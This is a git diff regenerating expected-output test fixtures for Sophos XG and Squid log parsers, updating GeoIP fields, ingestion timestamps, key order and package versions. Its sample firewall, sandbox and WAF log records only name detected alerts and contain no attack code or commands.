src_port=58914 dst_port=53 platform=\"BSD,Linux,Mac,Other,Solaris,Unix,Windows\" category=\"protocol-dns\" target=\"Server\"", "code": "020804407002", "kind": "alert", @@ -7804,19 +7499,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, 
@@ -7830,19 +7520,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 59476, @@ -7900,7 +7585,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.715618700Z", + "ingested": "2021-12-14T14:54:45.179862312Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:56 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name=\"\" signature_id=53589 signature_msg=\"SERVER-WEBAPP DrayTek multiple products command injection attempt\" classification=\"Web Application Attack\" rule_priority=2 src_ip=175.16.199.1 src_country_code=NLD dst_ip=175.16.199.1 dst_country_code=R1 protocol=\"TCP\" src_port=59476 dst_port=80 platform=\"Linux,Mac,Other,Unix,Windows\" category=\"server-webapp\" target=\"Server\"", "code": "020804407002", "kind": "alert", 
@@ -7990,7 +7675,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.715625100Z", + "ingested": "2021-12-14T14:54:45.179862865Z", "original": "device=\"SFW\" date=2018-05-23 time=16:20:34 timezone=\"BST\" device_name=\"XG750\" device_id=SFDemo-f64dd6be log_id=020703406001 log_type=\"IDP\" log_component=\"Anomaly\" log_subtype=\"Detect\" priority=Warning idp_policy_id=1 fw_rule_id=2 user_name=\"\" signature_id=26022 signature_msg=\"FILE-PDF EmbeddedFile contained within a PDF\" classification=\"A Network Trojan was detected\" rule_priority=1 src_ip=10.0.0.168 src_country_code=R1 dst_ip=10.1.1.234 dst_country_code=R1 protocol=\"TCP\" src_port=28938 dst_port=25 platform=\"Windows\" category=\"Malware Communication\" target=\"Server\"", "code": "020703406001", "kind": "alert", @@ -8080,7 +7765,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.715631100Z", + "ingested": "2021-12-14T14:54:45.179863239Z", "original": "device=\"SFW\" date=2018-05-23 time=16:16:43 timezone=\"BST\" device_name=\"XG750\" device_id=SFDemo-f64dd6be log_id=020704406002 log_type=\"IDP\" log_component=\"Anomaly\" log_subtype=\"Drop\" priority=Warning idp_policy_id=1 fw_rule_id=2 user_name=\"\" signature_id=26022 signature_msg=\"FILE-PDF EmbeddedFile contained within a PDF\" classification=\"A Network Trojan was detected\" rule_priority=1 src_ip=10.0.1.31 src_country_code=R1 dst_ip=10.1.0.115 dst_country_code=R1 protocol=\"TCP\" src_port=40140 dst_port=25 platform=\"Windows\" category=\"Malware Communication\" target=\"Server\"", "code": "020704406002", "kind": "alert", @@ -8097,12 +7782,6 @@ } }, { - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "XG", "serial_number": "C44310050024-P29PUA", @@ -8121,6 +7800,9 @@ "defaulttest.local" ] }, + "log": { + "level": "informational" + }, "sophos": { "xg": { "reason": "eligible", 
@@ -8138,7 +7820,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715637200Z", + "ingested": "2021-12-14T14:54:45.179863621Z", "original": "device=\"SFW\" date=2017-01-31 time=14:52:11 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=138301618041 log_type=\"Sandbox\" log_component=\"Mail\" log_subtype=\"Allowed\" priority=Information user_name=\"\" src_ip= filename=\"\" filetype=\"\" filesize=0 sha1sum=\"\" source=\"\" reason=\"eligible\" destination=\"\" subject=\"\"", "code": "138301618041", "kind": "event", @@ -8152,7 +7834,10 @@ "connection" ], "outcome": "success" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -8220,7 +7905,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:55.715643Z", + "ingested": "2021-12-14T14:54:45.179863985Z", "original": "device=\"SFW\" date=2017-01-31 time=14:52:11 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=138302218042 log_type=\"Sandbox\" log_component=\"Mail\" log_subtype=\"Denied\" priority=Critical user_name=\"jsmith@iview.com\" src_ip=10.198.47.112 filename=\"1.exe\" filetype=\"application/octet-stream\" filesize=153006 sha1sum=\"83cd339302bf5e8ed5240ca6383418089c337a81\" source=\"jsmith@iview.com\" reason=\"cached malicious\" destination=\"\" subject=\"\"", "code": "138302218042", "kind": "alert", @@ -8237,12 +7922,6 @@ } }, { - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "XG", "serial_number": "C44313350024-P29PUA", @@ -8261,6 +7940,9 @@ "defaulttest.local" ] }, + "log": { + "level": "informational" + }, "sophos": { "xg": { "reason": "eligible", 
@@ -8278,7 +7960,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715648800Z", + "ingested": "2021-12-14T14:54:45.179864371Z", "original": "device=\"SFW\" date=2017-01-31 time=15:28:25 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44313350024-P29PUA log_id=136501618041 log_type=\"Sandbox\" log_component=\"Web\" log_subtype=\"Allowed\" priority=Information user_name=\"\" src_ip= filename=\"\" filetype=\"\" filesize=0 sha1sum=\"\" source=\"\" reason=\"eligible\" destination=\"\" subject=\"\"", "code": "136501618041", "kind": "event", @@ -8292,7 +7974,10 @@ "connection" ], "outcome": "success" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -8360,7 +8045,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715729400Z", + "ingested": "2021-12-14T14:54:45.179864832Z", "original": "device=\"SFW\" date=2017-01-31 time=15:28:25 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=136528618043 log_type=\"Sandbox\" log_component=\"Web\" log_subtype=\"Pending\" priority=Information user_name=\"jsmith\" src_ip=10.198.47.112 filename=\"19.exe\" filetype=\"application/octet-stream\" filesize=153010 sha1sum=\"3ce799580908df9ca0dc649aa8c2d06ab267e8c8\" source=\"10.198.241.50\" reason=\"pending\" destination=\"\" subject=\"\"", "code": "136528618043", "kind": "event", 
@@ -8441,7 +8126,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:55.715736400Z", + "ingested": "2021-12-14T14:54:45.179865205Z", "original": "device=\"SFW\" date=2017-01-31 time=15:28:25 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=136502218042 log_type=\"Sandbox\" log_component=\"Web\" log_subtype=\"Denied\" priority=Critical user_name=\"jsmith\" src_ip=10.198.47.112 filename=\"19.exe\" filetype=\"application/octet-stream\" filesize=153010 sha1sum=\"3ce799580908df9ca0dc649aa8c2d06ab267e8c8\" source=\"10.198.241.50\" reason=\"cloud malicious\" destination=\"\" subject=\"", "code": "136502218042", "kind": "alert", @@ -8517,7 +8202,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:55.715742800Z", + "ingested": "2021-12-14T14:54:45.179865579Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:36 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=136502218042 log_type=\"Sandbox\" log_component=\"Web\" log_subtype=\"Denied\" priority=Critical user_name=\"\" src_ip=175.16.199.1 filename=\"SBTestFile1.pdf\" filetype=\"application/pdf\" filesize=1124 sha1sum=\"d910c4a81122c360fe57f67a04999425a65249db\" source=\"sophostest.com\" reason=\"cached malicious\" destination=\"\" subject=\"\"", "code": "136502218042", "kind": "alert", @@ -8544,19 +8229,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 401, 
@@ -8565,19 +8245,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 1419, @@ -8638,7 +8313,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715749Z", + "ingested": "2021-12-14T14:54:45.179865958Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:46 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=webmail.elasticuser.com sourceip=175.16.199.1 localip=175.16.199.1 ws_protocol=\"HTTP/1.1\" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie=\"MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsxYNAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDoAitM4bv3XCA==;MapiSequence=10-GtgsIA==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7PxcrL\" referer=- method=POST httpstatus=401 reason=\"-\" extra=\"-\" contenttype=\"-\" useragent=\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4954; Pro)\" host=175.16.199.1 responsetime=11199 bytessent=5669 bytesrcv=1419 fw_rule_id=79", "code": "075000617071", "kind": "alert", 
@@ -8667,19 +8342,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 200, @@ -8688,19 +8358,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 1774, 
@@ -8762,7 +8427,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715753100Z", + "ingested": "2021-12-14T14:54:45.179866350Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:47 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=webmail.elasticuser.com sourceip=175.16.199.1 localip=175.16.199.1 ws_protocol=\"HTTP/1.1\" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie=\"MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsw0NAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDpeyft5bv3XCA==;MapiSequence=9-Km2JMg==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7Oxc3M\" referer=- method=POST httpstatus=200 reason=\"-\" extra=\"-\" contenttype=\"application/mapi-http\" useragent=\"Microsoft Office/16.0 (Windows NT 6.2; Microsoft Outlook 16.0.4954; Pro)\" host=175.16.199.1 responsetime=14086 bytessent=1357 bytesrcv=1774 fw_rule_id=79", "code": "075000617071", "kind": "alert", 
@@ -8859,7 +8524,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715757900Z", + "ingested": "2021-12-14T14:54:45.179866792Z", "original": "device=\"SFW\" date=2020-05-19 time=17:20:29 timezone=\"IST\" device_name=\"XG230\" device_id=1234567890123457 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"jsmith\" server=www.iviewtest.com:8989 sourceip=10.198.235.254 localip=10.198.233.48 ws_protocol=\"HTTP/1.1\" url=/ querystring= cookie=\"-\" referer=- method=GET httpstatus=403 reason=\"Static URL Hardening\" extra=\"No signature found\" contenttype=\"text/html\" useragent=\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0\" host=10.198.235.254 responsetime=19310 bytessent=726 bytesrcv=510 fw_rule_id=3", "code": "075000617071", "kind": "alert", @@ -8959,7 +8624,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715763800Z", + "ingested": "2021-12-14T14:54:45.179867168Z", "original": "device=\"SFW\" date=2020-05-19 time=18:03:30 timezone=\"IST\" device_name=\"XG230\" device_id=1234567890123456 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"jsmith\" server=www.iviewtest.com:8990 sourceip=10.198.235.254 localip=10.198.233.48 ws_protocol=\"HTTP/1.1\" url=/download/eicarcom2.zip querystring= cookie=\"; PHPSESSID=jetkd9iadd969hsr77jpj4q974; _pk_id.1.fc3a=3a6250e215194a92.1485866024.1.1485866069.1485866024.; _pk_ses.1.fc3a=*\" referer=http://www.iviewtest.com:8990/85-0-Download.html method=GET httpstatus=403 reason=\"Antivirus\" extra=\"EICAR-AV-Test\" contenttype=\"text/html\" useragent=\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0\" host=10.198.235.254 responsetime=403214 bytessent=739 bytesrcv=715 fw_rule_id=6", "code": "075000617071", "kind": "alert", 
@@ -8989,19 +8654,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 403, @@ -9010,19 +8670,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 295, @@ -9083,7 +8738,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715769700Z", + "ingested": "2021-12-14T14:54:45.179867591Z", "original": "device=\"SFW\" date=2020-05-20 time=18:03:31 timezone=\"IST\" device_name=\"XG230\" device_id=1234567890123457 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=- sourceip=175.16.199.1 localip=175.16.199.1 ws_protocol=\"HTTP/1.0\" url=/ querystring=\"\" cookie=\"-\" referer=\"-\" method=GET httpstatus=403 reason=\"WAF Anomaly\" extra=\"Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header\" contenttype=\"text/html\" useragent=\"-\" host=175.16.199.1 responsetime=608 bytessent=5353 bytesrcv=295 fw_rule_id=3", "code": "075000617071", "kind": "alert", 
@@ -9137,7 +8792,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715775600Z", + "ingested": "2021-12-14T14:54:45.179867971Z", "original": "device=\"SFW\" date=2017-02-01 time=14:17:35 timezone=\"IST\" device_name=\"SG115\" device_id=S110016E28BA631 log_id=106025618011 log_type=\"Wireless Protection\" log_component=\"Wireless Protection\" log_subtype=\"Information\" priority=Information ap=A40024A636F7862 ssid=SPIDIGO2015 clients_conn_ssid=2", "code": "106025618011", "kind": "event", @@ -9185,7 +8840,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715780600Z", + "ingested": "2021-12-14T14:54:45.179868336Z", "original": "device=\"SFW\" date=2017-02-01 time=14:19:47 timezone=\"IST\" device_name=\"SG115\" device_id=S110016E28BA631 log_id=106025618011 log_type=\"Wireless Protection\" log_component=\"Wireless Protection\" log_subtype=\"Information\" priority=Information ap=A40024A636F7862 ssid=SPIDIGO2015 clients_conn_ssid=3", "code": "106025618011", "kind": "event", diff --git a/packages/sophos/manifest.yml b/packages/sophos/manifest.yml index fe077a08a6c..778efe6f3e5 100644 --- a/packages/sophos/manifest.yml +++ b/packages/sophos/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: sophos title: Sophos Logs -version: 1.1.1 +version: 1.1.2 description: Collect and parse logs from Sophos Products with Elastic Agent. categories: ["security"] release: ga diff --git a/packages/squid/changelog.yml b/packages/squid/changelog.yml index 19918bf137e..11824ceb333 100644 --- a/packages/squid/changelog.yml +++ b/packages/squid/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.6.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.6.0" changes: - description: Add 8.0.0 version constraint 
diff --git a/packages/squid/data_stream/log/_dev/test/pipeline/test-access1.log-expected.json b/packages/squid/data_stream/log/_dev/test/pipeline/test-access1.log-expected.json index 40588223329..45dd04f5194 100644 --- a/packages/squid/data_stream/log/_dev/test/pipeline/test-access1.log-expected.json +++ b/packages/squid/data_stream/log/_dev/test/pipeline/test-access1.log-expected.json 
@@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "1157689312.049 5006 10.105.21.199 TCP_MISS/200 19763 CONNECT login.yahoo.com:443 badeyek DIRECT/209.73.177.115 -", "event": { - "ingested": "2021-06-08T12:14:41.661956500Z" + "ingested": "2021-12-14T14:55:08.315628175Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689320.327 2864 10.105.21.199 TCP_MISS/200 10182 GET http://www.goonernews.com/ badeyek DIRECT/207.58.145.61 text/html", "event": { - "ingested": "2021-06-08T12:14:41.661977800Z" + "ingested": "2021-12-14T14:55:08.315630625Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689320.343 1357 10.105.21.199 TCP_REFRESH_HIT/304 214 GET http://www.goonernews.com/styles.css badeyek DIRECT/207.58.145.61 -", "event": { - "ingested": "2021-06-08T12:14:41.661984700Z" + "ingested": "2021-12-14T14:55:08.315631050Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689321.315 1 10.105.21.199 TCP_HIT/200 1464 GET http://www.goonernews.com/styles.css badeyek NONE/- text/css", "event": { - "ingested": "2021-06-08T12:14:41.661990800Z" + "ingested": "2021-12-14T14:55:08.315631410Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689322.780 1464 10.105.21.199 TCP_HIT/200 5626 GET http://www.google-analytics.com/urchin.js badeyek NONE/- text/javascript", "event": { - "ingested": "2021-06-08T12:14:41.662034800Z" + "ingested": "2021-12-14T14:55:08.315631819Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689323.718 3856 10.105.21.199 TCP_MISS/200 30169 GET http://www.goonernews.com/ badeyek 
DIRECT/207.58.145.61 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662041800Z" + "ingested": "2021-12-14T14:55:08.315632162Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689324.156 1372 10.105.21.199 TCP_MISS/200 399 GET http://www.google-analytics.com/__utm.gif? badeyek DIRECT/66.102.9.147 image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662047400Z" + "ingested": "2021-12-14T14:55:08.315632507Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689324.266 1457 10.105.21.199 TCP_REFRESH_HIT/304 215 GET http://www.goonernews.com/graphics/newslogo.gif badeyek DIRECT/207.58.145.61 -", "event": { - "ingested": "2021-06-08T12:14:41.662052400Z" + "ingested": "2021-12-14T14:55:08.315632877Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689324.281 1465 10.105.21.199 TCP_REFRESH_HIT/304 215 GET http://www.goonernews.com/shop/arsenal_shop_ad.jpg badeyek DIRECT/207.58.145.61 -", "event": { - "ingested": "2021-06-08T12:14:41.662056800Z" + "ingested": "2021-12-14T14:55:08.315633278Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689325.734 1452 10.105.21.199 TCP_REFRESH_HIT/304 214 GET http://www.goonernews.com/flags/FUS.gif badeyek DIRECT/207.58.145.61 -", "event": { - "ingested": "2021-06-08T12:14:41.662062100Z" + "ingested": "2021-12-14T14:55:08.315633607Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689325.736 2 10.105.21.199 TCP_HIT/200 1353 GET http://www.goonernews.com/flags/FGB.gif badeyek NONE/- image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662078500Z" + "ingested": 
"2021-12-14T14:55:08.315633949Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689325.953 2603 10.105.21.199 TCP_MISS/200 1013 GET http://as.casalemedia.com/s? badeyek DIRECT/209.85.16.38 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662086500Z" + "ingested": "2021-12-14T14:55:08.315634813Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689326.703 4459 10.105.21.199 TCP_MISS/200 1845 CONNECT us.bc.yahoo.com:443 badeyek DIRECT/68.142.213.132 -", "event": { - "ingested": "2021-06-08T12:14:41.662092200Z" + "ingested": "2021-12-14T14:55:08.315635154Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689327.312 1356 10.105.21.199 TCP_MISS/302 729 GET http://impgb.tradedoubler.com/imp/img/16349696/992098 badeyek DIRECT/217.212.240.172 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662097Z" + "ingested": "2021-12-14T14:55:08.315635496Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689327.751 3484 10.105.21.199 TCP_MISS/200 1577 GET http://4.adbrite.com/mb/text_group.php? 
badeyek DIRECT/206.169.136.22 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662102400Z" + "ingested": "2021-12-14T14:55:08.315635836Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689327.803 9 10.105.21.199 TCP_HIT/200 1353 GET http://www.goonernews.com/flags/FFR.gif badeyek NONE/- image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662107100Z" + "ingested": "2021-12-14T14:55:08.315636166Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689329.234 1431 10.105.21.199 TCP_REFRESH_HIT/304 214 GET http://www.goonernews.com/flags/FAU.gif badeyek DIRECT/207.58.145.61 -", "event": { - "ingested": "2021-06-08T12:14:41.662118100Z" + "ingested": "2021-12-14T14:55:08.315636602Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689329.280 1414 10.105.21.199 TCP_REFRESH_HIT/304 213 GET http://www.goonernews.com/graphics/spacer.gif badeyek DIRECT/207.58.145.61 -", "event": { - "ingested": "2021-06-08T12:14:41.662122400Z" + "ingested": "2021-12-14T14:55:08.315636932Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689330.920 1686 10.105.21.199 TCP_MISS/200 1784 GET http://4.adbrite.com/mb/text_group.php? badeyek DIRECT/64.127.126.178 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662126600Z" + "ingested": "2021-12-14T14:55:08.315637260Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689331.313 3997 10.105.21.199 TCP_MISS/302 851 GET http://ff.connextra.com/Ladbrokes/selector/image? 
badeyek DIRECT/213.160.98.161 -", "event": { - "ingested": "2021-06-08T12:14:41.662131300Z" + "ingested": "2021-12-14T14:55:08.315637590Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689335.275 3962 10.105.21.199 TCP_MISS/200 30904 GET http://dd.connextra.com/servlet/controller? badeyek DIRECT/213.160.98.160 image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662135800Z" + "ingested": "2021-12-14T14:55:08.315637914Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689337.481 4 10.105.47.218 TCP_DENIED/407 1661 GET http://hi5.com/ - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662140100Z" + "ingested": "2021-12-14T14:55:08.315638248Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689342.757 3657 10.105.21.199 TCP_MISS/200 12569 CONNECT login.yahoo.com:443 badeyek DIRECT/209.73.177.115 -", "event": { - "ingested": "2021-06-08T12:14:41.662144200Z" + "ingested": "2021-12-14T14:55:08.315638584Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689343.106 1 10.105.33.214 TCP_DENIED/407 1752 GET http://update.messenger.yahoo.com/msgrcli7.html - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662148700Z" + "ingested": "2021-12-14T14:55:08.315639080Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689343.782 1371 10.105.33.214 TCP_MISS/200 484 POST http://shttp.msg.yahoo.com/notify/ adeolaegbedokun DIRECT/216.155.194.239 text/plain", "event": { - "ingested": "2021-06-08T12:14:41.662153500Z" + "ingested": "2021-12-14T14:55:08.315639409Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": 
